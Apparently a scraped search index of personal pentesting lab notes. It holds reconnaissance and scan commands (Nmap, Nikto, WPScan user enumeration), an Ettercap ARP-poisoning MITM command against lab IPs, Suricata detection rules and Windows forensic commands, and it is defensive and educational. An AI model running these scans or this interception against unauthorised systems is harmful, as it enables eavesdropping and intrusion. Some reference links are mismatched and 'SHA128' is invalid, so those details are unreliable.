At this point we should get back a reverse connection on the multi handler.\nEXTRA READING:\nSecurity Account Manager: https://www.techtarget.com/searchenterprisedesktop/definition/Security-Accounts-Manager\nActive Directory Domain Services overview: https://www.techtarget.com/searchenterprisedesktop/definition/Security-Accounts-Manager\nPowerView command list: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon\nBloodHound documentation: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon\nLLMNR/NBT-NS poisoning and SMB relay: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/03-leveraging-network-based-trust/","title":"Leveraging Network-Based Trust in AD"},{"content":"WhatWeb: WhatWeb is a tool that helps penetration testers easily identify the technologies in use and fingerprint web servers and web applications on a target system. Currently I am running OWASP Juice Shop, DVWA (on Kali) and Metasploitable 2. You can run these commands on any of these 3 machines, as Metasploitable 2 also hosts various vulnerable web applications like DVWA, Mutillidae and TWiki. 
You can use those, but make sure you provide the proper directory in the commands.\nDVWA (Damn Vulnerable Web App) setup: Follow the instructions in the README.md of the DVWA GitHub page.\nOWASP Juice Shop setup: First install Docker using the following commands:\ncurl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-archive-keyring.gpg >/dev/null\necho 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list\nsudo apt-get update\nsudo apt install -y docker-ce docker-ce-cli containerd.io\nOWASP Juice Shop installation steps:\nsudo systemctl restart docker\nsudo docker pull bkimminich/juice-shop\nsudo docker run --rm -p 3000:3000 bkimminich/juice-shop\nI will be using DVWA and Metasploitable 2 at a basic level for this practical.\nCommands:\nwhatweb http://localhost/DVWA\nwhatweb 172.30.1.134 # metasploitable2 machine ip\nTo put it simply, WhatWeb provides the following details:\nThe web application and its version\nThe web technologies and their versions\nThe host operating system and its version\nNmap for web app scanning: Using Nmap HTTP scripts for the web app scan.\n1. First we need to see what kind of scripts are available using the following command:\nls /usr/share/nmap/scripts/http*\n2. From the list, you can choose a particular script to check for HTTP vulnerabilities on a target system. Let's imagine that you want to identify whether a target web application is vulnerable to Structured Query Language (SQL) injection attacks. 
The http-sql-injection NSE script will be able to identify such security flaws.\nnmap --script http-sql-injection -p 80 172.30.1.134\nTip: While many scripts within Nmap can be leveraged to identify vulnerabilities within web applications, it is important to always identify the service version of the web application by simply using the -A syntax when performing an initial scan to profile your target. Once you have identified the web application's service version, use the internet to research known vulnerabilities. As a penetration tester, it's always good to perform additional research on vulnerabilities as you may find more information on how to compromise the target.\nMetasploit for web app scanning: This time we will start by initializing the PostgreSQL database of msfconsole to store the data. Follow the commands for initialization:\nservice postgresql start\nsudo msfdb init\nThen start msfconsole. To check the connectivity with the database, use the command db_status inside msfconsole. Then load the WMAP web vulnerability scanner plugin within Metasploit with load wmap. Next, use the wmap_sites -a command to set the target as the OWASP BWA virtual machine IP address; to check whether the site has been added, use wmap_sites -l; to set the target, use wmap_targets -t. To run WMAP use the command wmap_run -t; this will automatically load the web scanning modules from Metasploit for security testing. Once the web scanning modules have been loaded, use wmap_run -e to perform web security testing on the target web application. Lastly, use the vulns command to see the overall results of the security assessment from WMAP.\nNikto scanning: Nikto scan command:\nnikto -h 172.30.1.134\n-h: This option allows us to specify the target's hostname or IP address.\nYou can read through the entire scan for different vulnerabilities. 
Scanning with WPScan: While there are many web applications within the e-commerce industry, there are many organizations that deploy the WordPress web application as their preferred Content Management System (CMS).\nWithin Kali Linux, you will learn about the WPScan tool, which allows penetration testers to perform vulnerability scanning and enumeration on the WordPress web application on a target server.\nLet's get started with WPScan:\nwpscan --url http://172.30.1.134:8585/wordpress --no-update\nThe following is a brief description of the syntax:\n--url: specifies the target URL\n--no-update: performs a scan without checking for updates\nWPSCAN IS APPLICABLE ONLY TO APPLICATIONS BUILT WITH WORDPRESS. Next, to enumerate the login usernames of the target WordPress web application, use the -e u syntax:\nwpscan --url http://172.30.1.134:8585/wordpress --no-update -e u\nTip: To learn more about WPScan and its capabilities, please see https://tools.kali.org/web-applications/wpscan.\nFurther reading:\nWeb application vulnerability scanners: https://hub.packtpub.com/implementing-web-application-vulnerability-scanners-withkali-linux-tutorial/\nSecure web-based applications: https://hub.packtpub.com/why-secureweb-based-applications-with-kali-linux/ ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/03-using-web-application-scanners/","title":"Using Web Application Scanners"},{"content":"Graphical User Interface for the Empire server, useful for collaboration during a pentest. In this section we will be using the main Kali Linux machine and the target will be the same Windows Server 2019.\nCredentials and reporting: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/03-working-with-starkiller/","title":"Working With Starkiller"},{"content":"Volatile data collection: System uptime and current time: In Command Prompt:\n(date /t) & (time /t)\nsysteminfo | find \"Boot Time\"\nIn PowerShell:\n(Get-Date) - (gcim Win32_OperatingSystem).LastBootUpTime\nNetwork parameters (NetBIOS name cache, active connections, routing table etc.):\nnbtstat -c\nnetstat -ano\nnetstat -rn\nipconfig /all\nPromiscuous mode detection on NICs through PowerShell:\nGet-NetAdapter | Format-List -Property ifAlias, PromiscuousMode\nSysinternals tools: logged-on users info:\nPsLoggedon.exe -x\nlogonsessions.exe -p\nnet sessions\nnet user user_name\nHash analysis: Using 
powershell:\nGet-FileHash .\\FTK_sample_00.E01 -Algorithm MD5 Get-FileHash .\\FTK_sample_00.E01 -Algorithm SHA128 Open file information: net file list of running processes, services: tasklist /svc scheduled tasks info: schtasks /query history checking: doskey /history In powershell:\nGet-History Examining print spool files: cd C:\\Windows\\System32\\spool\\PRINTERS # look for .SPL and .SHD files WMIC: wmic service list brief File shares: net share Non-volatile data collection: File system examination: dir /o:d ESE database view: Install esedatabase view tool from internet -\u0026gt; then open the following dir inside the tool : C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb\nRegistry analysis: Collecting system information: open registry editor Then go to this path: Double click on the right side\u0026rsquo;s ComputerName option to see the name. To see current version of windows -\u0026gt; HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion Last shutdown time information: HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Windows time zone settings -\u0026gt; HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation Share information -\u0026gt; HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Shares Evaluating account management events: win + r -\u0026gt; secpol.msc -\u0026gt; enter -\u0026gt; double click local policies -\u0026gt; click audit policy browser cache analysis: History and cookies location for google chrome: C:\\Users\\{user_name}\\AppData\\Local\\Google\\Chrome\\UserData\\Default cache location: C:\\Users\\{user_name}\\AppData\\Local\\Google\\Chrome\\UserData\\Default\\Cache Note Location is identical for every browser, just choose the proper name of the browser.\n","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/windows-forensics/","summary":"\u003ch2 id=\"volatile-data-collection\"\u003eVolatile data collection:\u003c/h2\u003e\n\u003ch3 
id=\"system-uptime-and-current-time\"\u003esystem uptime and current time:\u003c/h3\u003e\n\u003cp\u003e\u003cem\u003eIn command prompt:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003edate\u003c/span\u003e /t\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"p\"\u003e\u0026amp;\u003c/span\u003e \u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003etime\u003c/span\u003e /t\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esysteminfo \u003cspan class=\"p\"\u003e|\u003c/span\u003e find \u003cspan class=\"s2\"\u003e\u0026#34;Boot Time\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_1\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_1.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eIn powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"nb\"\u003eGet-Date\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"p\"\u003e-\u003c/span\u003e \u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003egcim\u003c/span\u003e \u003cspan class=\"n\"\u003eWin32_OperatingSystem\u003c/span\u003e\u003cspan class=\"p\"\u003e).\u003c/span\u003e\u003cspan class=\"py\"\u003eLastBootUpTime\u003c/span\u003e  
\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_2\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_2.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"network-parametersnetbios-name-cache-active-connections-routing-table-etc\"\u003eNetwork parameters(NetBIOS name cache, active connections, routing table etc):\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enbtstat -c\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -ano\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -rn\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eipconfig /all\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003ePromiscous mode detection on NICs through powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-NetAdapter\u003c/span\u003e \u003cspan class=\"p\"\u003e|\u003c/span\u003e \u003cspan class=\"nb\"\u003eFormat-List\u003c/span\u003e \u003cspan class=\"n\"\u003e-Property\u003c/span\u003e \u003cspan class=\"n\"\u003eifAlias\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ePromiscuousMode\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"sysinternal-tools\"\u003eSysinternal tools:\u003c/h3\u003e\n\u003ch4 id=\"logged-on-users-info\"\u003elogged on users info:\u003c/h4\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ePsLoggedon.exe -x\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elogonsessions.exe -p\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet sessions\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet user user_name\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_3\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_3.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"hash-analysis\"\u003eHash analysis:\u003c/h3\u003e\n\u003cp\u003e\u003cem\u003eUsing powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-FileHash\u003c/span\u003e \u003cspan class=\"p\"\u003e.\\\u003c/span\u003e\u003cspan class=\"n\"\u003eFTK_sample_00\u003c/span\u003e\u003cspan class=\"p\"\u003e.\u003c/span\u003e\u003cspan class=\"py\"\u003eE01\u003c/span\u003e \u003cspan class=\"n\"\u003e-Algorithm\u003c/span\u003e \u003cspan class=\"n\"\u003eMD5\u003c/span\u003e \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-FileHash\u003c/span\u003e \u003cspan class=\"p\"\u003e.\\\u003c/span\u003e\u003cspan class=\"n\"\u003eFTK_sample_00\u003c/span\u003e\u003cspan class=\"p\"\u003e.\u003c/span\u003e\u003cspan class=\"py\"\u003eE01\u003c/span\u003e \u003cspan class=\"n\"\u003e-Algorithm\u003c/span\u003e \u003cspan 
class=\"n\"\u003eSHA128\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"open-file-information\"\u003eOpen file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet file\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"list-of-running-processes-services\"\u003elist of running processes, services:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etasklist /svc\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"scheduled-tasks-info\"\u003escheduled tasks info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eschtasks /query\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"history-checking\"\u003ehistory checking:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edoskey /history\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003eIn powershell:\u003c/em\u003e\u003c/p\u003e","title":"Practical Demo: Windows Forensics"},{"content":" Follow these commands step by step -\u0026gt; sudo apt-get install software-properties-common sudo add-apt-repository ppa:oisf/suricata-stable sudo apt-get update sudo apt-get install suricata It will be installed 
directly. Use the github repo testmynids.org to generate malicious traffic inside the network and monitor the alerts. Or follow the next steps for some adventure, adding custom rules and basic testing methods. Generating custom rules in suricata: ARP request alerts: Open the suricata.rules file, where we will add the rule: sudo vim /var/lib/suricata/rules/suricata.rules Add the following rule in your desired location inside the file: alert arp any any -\u0026gt; any any (msg:\u0026#34;LOCAL Testnet ARP Scanning Detected\u0026#34;; threshold: type both, track by_src, count 15, seconds 5; sid:1000002; rev:1;) Command debrief: \u0026ldquo;If any device sends 15 or more ARP packets within 5 seconds, generate an alert with ID 1000002.\u0026rdquo;\nEnable the ARP capturing: Save and exit.\nRestart suricata using the following command:\nsudo systemctl restart suricata command screenshots: Use the following command to generate traffic from another machine (or the same machine) from a terminal: sudo netdiscover -r 192.168.83.0/24 We can see the logs coming in. SSH bruteforce rule: Next, add a custom rule for logging SSH brute force attempts: alert tcp any any -\u0026gt; any 22 (msg:\u0026#34;LOCAL SSH Brute Force Detected\u0026#34;; flags:S; flow:stateless; threshold: type both, track by_src, count 5, seconds 30; sid:1000003; rev:1;) We are checking for the initial packet of the TCP handshake, which carries the SYN flag. count 5, seconds 30: Triggers if one IP tries to initiate 5 connections in 30 seconds. Again restart suricata after adding this rule. Integrating suricata with wazuh: I have integrated suricata logs directly inside wazuh, I\u0026rsquo;ll share now how I did that. 
It\u0026rsquo;s much easier to see the logs in a GUI pane rather than in a cli view.(my preference)\nNote You must have already configured wazuh properly.\nConfiguring the Wazuh-agent : Open the agent config file -\u0026gt; sudo vim /var/ossec/etc/ossec.conf Search inside vim \u0026lt;ossec-config\u0026gt; , if you don\u0026rsquo;t know how to search, simply press / and then write whatever you are looking for like this /\u0026lt;ossec-config\u0026gt; Then look for \u0026lt;localfile\u0026gt; block and add the suricata log location : \u0026lt;localfile\u0026gt; \u0026lt;log_format\u0026gt;json\u0026lt;/log_format\u0026gt; \u0026lt;location\u0026gt;/var/log/suricata/eve.json\u0026lt;/location\u0026gt; \u0026lt;/localfile\u0026gt; Save and exit Restart wazuh-agent using the following command: sudo systemctl restart wazuh-agent You can see the logs inside wazuh\u0026rsquo;s overview tab. Also to filter suricata specific logs , on the global search bar use the following command: rule.groups:suricata ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/03-suricata/00-installation--rule-creation/","summary":"\u003col\u003e\n\u003cli\u003eFollow these commands step by step -\u0026gt;\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get install software-properties-common\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo add-apt-repository ppa:oisf/suricata-stable\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get update\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get install suricata\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col 
start=\"2\"\u003e\n\u003cli\u003eIt will be installed directly.\u003c/li\u003e\n\u003cli\u003eUse the github repo \u003ccode\u003etestmynids.org\u003c/code\u003e to generate malicious traffic inside the network and monitor the alerts.\u003c/li\u003e\n\u003cli\u003eOr follow the next steps for some adventure , adding custom rules and basic testing methods.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2 id=\"generating-custom-rules-in-suricata\"\u003eGenerating custom rules in suricata:\u003c/h2\u003e\n\u003ch3 id=\"arp-request-alerts\"\u003eARP request alerts:\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eOpen the \u003cstrong\u003esuricata.rules\u003c/strong\u003e file, where we will add the rule:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo vim /var/lib/suricata/rules/suricata.rules\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eAdd the following rule in your desired location inside the file:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ealert arp any any -\u0026gt; any any \u003cspan class=\"o\"\u003e(\u003c/span\u003emsg:\u003cspan class=\"s2\"\u003e\u0026#34;LOCAL Testnet ARP Scanning Detected\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e;\u003c/span\u003e threshold: \u003cspan class=\"nb\"\u003etype\u003c/span\u003e both, track by_src, count 15, seconds 5\u003cspan class=\"p\"\u003e;\u003c/span\u003e sid:1000002\u003cspan class=\"p\"\u003e;\u003c/span\u003e rev:1\u003cspan class=\"p\"\u003e;\u003c/span\u003e\u003cspan 
class=\"o\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cstrong\u003eCommand debrief: \u003cem\u003e\u0026ldquo;If any device sends 15 or more ARP packets within 5 seconds, generate an alert with ID 1000002.\u0026rdquo;\u003c/em\u003e\u003c/strong\u003e\u003c/p\u003e","title":"Practical Suricata"},{"content":" Using Netdiscover: sudo netdiscover -p -i interface_name{eth0} -p : Passive mode. Keep in mind that while passive network scanners help to maintain a level of stealth on a network, they don’t always detect live systems as compared to performing active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there’s a possibility the targeted host may not be identified. NMAP ping sweep: nmap -sn 192.168.83.0/24 Nmap’s ping sweep does not send ICMP probes to the target; rather, it leverages TCP messages to determine whether specific ports are open on the targeted system. Therefore, if ICMP is restricted on a network, there’s a likelihood that TCP messages are permitted. 
Using nbtscan , the machines that can respond to NetBios like windows based machines, we can identify them on the network: sudo nbtscan 192.168.83.0/24 sudo nbtscan 192.168.83.138-141 let’s use Nmap to perform a port scan of the top 1,000 ports nmap 192.168.83.140 We can use the NMAP's -A option along with controlling the speed using -T option: nmap -A -T4 192.168.83.140 ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/04-live-host-discovery/","summary":"\u003col\u003e\n\u003cli\u003eUsing \u003ccode\u003eNetdiscover\u003c/code\u003e:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo netdiscover -p -i interface_name\u003cspan class=\"o\"\u003e{\u003c/span\u003eeth0\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ccode\u003e-p\u003c/code\u003e : Passive mode.\nKeep in mind that while passive network scanners help to maintain a level of stealth on a network, they don’t always detect live systems as compared to performing active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there’s a possibility the targeted host may not be identified.\n\u003cimg alt=\"lh_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/04/lh_1.png\"\u003e\u003c/p\u003e","title":"Live Host Discovery"},{"content":"When connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. 
Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext.\nWhile networking technologies have evolved over time, this is not the case for many network protocols with the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite and the Open Systems Interconnection (OSI) networking model. There are many applications and services that operate on a client-server model that send sensitive data in plaintext, allowing a penetration tester to both intercept and capture such data. Capturing user credentials and password hashes will allow you to easily gain access to clients and servers within the organization’s network. As shown in the preceding diagram, if the Windows host wants to communicate with the web server, both devices need to know the Media Access Control (MAC) address of each other. Because a Local Area Network (LAN) is mostly made up of switches that operate at Layer 2 of the OSI networking model, these devices only read the MAC addresses found within the Layer 2 header of the frame – not the IP addresses within the Layer 3 header. Therefore, for communication with two or more devices on the same network, the destination MAC address is vital for the switch to make its forwarding decision.\nIf a device such as the Windows host does not know the MAC address of the web server, it will broadcast an Address Resolution Protocol (ARP) request message to all devices within the same network segment (also known as a broadcast domain). The ARP request message will contain the destination host’s IP address, which is referred to as the target IP address. The host on the network that is assigned/configured with the target IP address will respond with its MAC address with an ARP reply message. 
Within each host device, there is an ARP cache, which temporarily stores the IP-to-MAC address mapping of devices.\nImportant ARP is a network protocol used to resolve IP addresses to MAC addresses within a network. Most host devices have a default inactivity timer of 300 seconds on their ARP cache.\nHowever, ARP is one of the many protocols that wasn’t designed with security in mind. Penetration testers can modify the entries within the ARP cache within a network host machine.\nThe following are the phases of a MITM attack:\nTo perform a MITM attack, the penetration tester needs to ensure their attack system, such as Kali Linux, is connected to the same network as the targets. Next, the attacker sends gratuitous ARP messages that contain false IP-to-MAC address information. The attacker will send gratuitous ARP messages to the Windows host and to the web server with their MAC ADDRESSES Once both targets’ ARP cache is poisoned with the false information, their traffic is sent through the attacker’s machine when both targets are communicating with each other, as shown: This attack allows the penetration tester to intercept all communications between multiple hosts on the network and simply forward the packets to their destinations! An unsuspecting user will not be aware that their traffic is being intercepted. While intercepting network packets, penetration testers usually run a packet capture/sniffer tool, such as the following: Wireshark: A free graphical user interface tool used by both networking and cybersecurity professionals to capture network packets and perform protocol analysis and troubleshooting. In addition to packet capture and analysis, Wireshark offers features such as protocol dissection, filtering, and statistical analysis. These capabilities are important for identifying patterns, anomalies, and potential security issues within network traffic. 
Tcpdump: A command line-based tool that allows cybersecurity professionals to capture network traffic for analysis. Intercepting traffic with MiTM attacks: Power on kali linux, Metasploitable 2 linux and THESPIDERMAN machine. Then identify the ip + MAC address of those machines using nmap nmap -sn 172.30.1.0/24 3. On Kali Linux, use the following Ettercap commands to perform a MiTM attack between the two targets:\nsudo ettercap -i eth2 -T -q -S -M arp:remote /172.30.1.134// /172.30.1.129// COMMAND BREAKDOWN: • -i: Allows you to specify the interface on your attacker machine that is connected to the network with your targets. • -T: Specifies the user interface as text-based output only. • -q: Specifies quiet mode, which does not print the packet information on the terminal. • -S: Specifies not to perform Secure Sockets Layer (SSL) forging. • -M arp:remote: Specifies to perform a MITM attack using ARP poisoning of the target’s cache and sniffer remote IP connections. The remote command is usually used when performing a MITM attack between a client and a gateway. 4. Next, open Wireshark on Kali Linux and start capturing packets on eth2, which is connected to the 172.30.1.0/24 network: 5. Open the web browser in kali and search http://metasploitable-2-linux_ip/ to generate traffic in between. 6. Let’s verify Ettercap is performing ARP poisoning on the Windows host. The following screenshot shows the ARP cache on THESPIDERMAN virtual machine: 7. Let\u0026rsquo;s see that arp traffic for windows machine: DNS TUNNELING: DNS tunneling is a type of cyberattack that allows hackers to bypass network security by using the Domain Name System (DNS) as a transport for malicious traffic. By hiding non-DNS traffic within DNS packets, attackers can often bypass network security measures. Successful DNS tunneling attacks allow hackers to bypass network security, exfiltrate data, control other computers, collect user credentials, or explore a network’s footprint for future attacks. 
What are DNS queries and DNS traffic? DNS is like GPS for the internet. DNS servers translate the human-readable names that users type into a web browser into machine-readable IP addresses — a string of numbers such as 2001:db8:3e8:2a3::b63 — that allow the browser to load the correct site. DNS lets people navigate the web using easy-to-remember domain names rather than keeping track of the IP address for the sites they want to visit. How do hackers use DNS tunneling? DNS tunneling enables attackers to perform a variety of malicious activities.\nInstalling malware. Attackers may use DNS tunneling to install malware on additional systems. Collecting credentials. Once they have command and control of a device, attackers can use keyloggers and other methods to collect user credentials that can be used to mount additional attacks or be sold on the dark web. Exploring the network. DNS queries from within an infected network can help attackers build a map of the network, identifying systems and high-value assets. Exfiltrating data. Cybercriminals may use DNS tunneling to transfer data out of the network, including sensitive or confidential user information. Controlling devices. With the ability to control an infected device, attackers can trigger other threats such as DDoS attacks. CREDITS: akamai-dns-tunneling-blog\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/04-mitm-attacks/","summary":"\u003cp\u003eWhen connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. 
While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext.\u003c/p\u003e","title":"MITM Attacks"},{"content":"After discovering the hosts on a network, the next phase is to identify any open service ports on the target system and determine which services are mapped to those open ports. There are various techniques that a penetration tester can use to identify the open ports on a target system. Some techniques are manual, while others can simply be automated using the Nmap tool.\nBasic nmap scan, this will perform a scan of the 1000 commonly used ports: nmap 172.30.1.134 Tip As an aspiring ethical hacker and penetration tester, if you\u0026rsquo;re not familiar with some of the services discovered from a scan, you must perform research to gain a better understanding of a service role and its functionality on a system and network.\nLet\u0026rsquo;s perform an advanced scan to determine the target\u0026rsquo;s OS and service versions and run script scanning: nmap -A -T4 -p- 172.30.1.134 SYNTAX 